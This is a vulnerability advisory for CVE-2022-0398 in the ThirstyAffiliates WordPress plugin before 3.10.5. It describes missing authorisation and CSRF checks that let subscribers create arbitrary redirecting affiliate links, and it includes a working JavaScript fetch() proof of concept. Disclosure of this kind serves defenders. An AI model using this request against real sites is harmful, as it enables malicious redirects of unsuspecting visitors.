ThirstyAffiliates Affiliate Link Manager < 3.10.5 – Subscriber+ Arbitrary Affiliate Links Creation | CVE 2022-0398 | Plugin Vulnerabilities

Description

The plugin does not have authorisation and CSRF checks when creating affiliate links, which could allow any authenticated user, such as subscriber to create arbitrary affiliate links, which could then be used to redirect users to an arbitrary website

Proof of Concept

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": "action=ta_process_quick_add_affiliate_link&ta_link_name=test&ta_destination_url=https://wpscan.com/&ta_redirect_type=301",
  "method": "POST",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

thirstyaffiliates

Fixed in 3.10.5

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

21aec131-91ff-4300-ac7a-0bf31d6b2b24

Timeline

Publicly Published

2022-03-31 (about 2 years ago)

Added

2022-03-31 (about 2 years ago)

Last Updated

2022-04-10 (about 2 years ago)

Other

Published

Title

Published

2022-10-28

Title

Modula < 2.6.91 - Unauthenticated Troubleshooting Settings Update

Published

2022-11-04

Title

Jeg Elementor Kit < 2.5.7 - Unauthenticated Settings Update

Published

2023-12-07

Title

Social Media Feather < 2.1.4 - Subscriber+ Unauthorised Action

Published

2023-11-21

Title

UserPro < 5.1.5 - Missing Authorization to Arbitrary Shortcode Execution via userpro_shortcode_template

Published

2023-10-16

Title

Ashe Extra < 1.2.92 - Subscriber+ Companion Plugin Activation & Content Import